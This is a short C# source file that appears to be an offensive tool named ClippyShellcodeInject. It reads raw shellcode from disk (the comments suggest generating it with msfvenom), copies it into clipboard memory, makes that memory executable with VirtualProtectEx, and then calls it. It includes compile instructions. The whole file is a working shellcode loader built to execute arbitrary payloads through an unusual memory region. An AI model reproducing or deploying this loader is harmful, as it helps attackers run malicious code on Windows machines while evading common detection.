// Using the clipboard as your code cave.
// Generate your shellcode with msfvenom or whatever
// Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs

using System;
using System.IO;
using System.Runtime.InteropServices;

namespace ClippySCInject
{
    class Program
    {
        
        private delegate IntPtr test();
        static void Main(string[] args)
        {
            byte[] payload = File.ReadAllBytes(@"C:\path\to\raw\shellcode.bin");
            OpenClipboard(IntPtr.Zero);
            GCHandle payloadArray = GCHandle.Alloc(payload, GCHandleType.Pinned);
            IntPtr payloadpointer = payloadArray.AddrOfPinnedObject();
            IntPtr scData = SetClipboardData(2, payloadpointer);
            CloseClipboard();
            uint oldProtect = 0; //Old protect is RW by default 
            if (VirtualProtectEx(GetCurrentProcess(), scData, (UIntPtr)payload.Length, 0x20/*RX*/, out oldProtect)) 
            {
                test executesc = (test)Marshal.GetDelegateForFunctionPointer(scData, typeof(test));
                executesc();
            }
        }

        [DllImport("User32.dll", EntryPoint= "OpenClipboard", SetLastError= true)]
        private static extern bool OpenClipboard(IntPtr hWndNewOwner);

        [DllImport("User32.dll", SetLastError = true)]
        static extern IntPtr SetClipboardData(uint uFormat, IntPtr hMem);

        [DllImport("user32.dll", SetLastError = true)]
        static extern bool CloseClipboard();

        [DllImport("kernel32.dll")]
        static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr GetCurrentProcess();

    }
}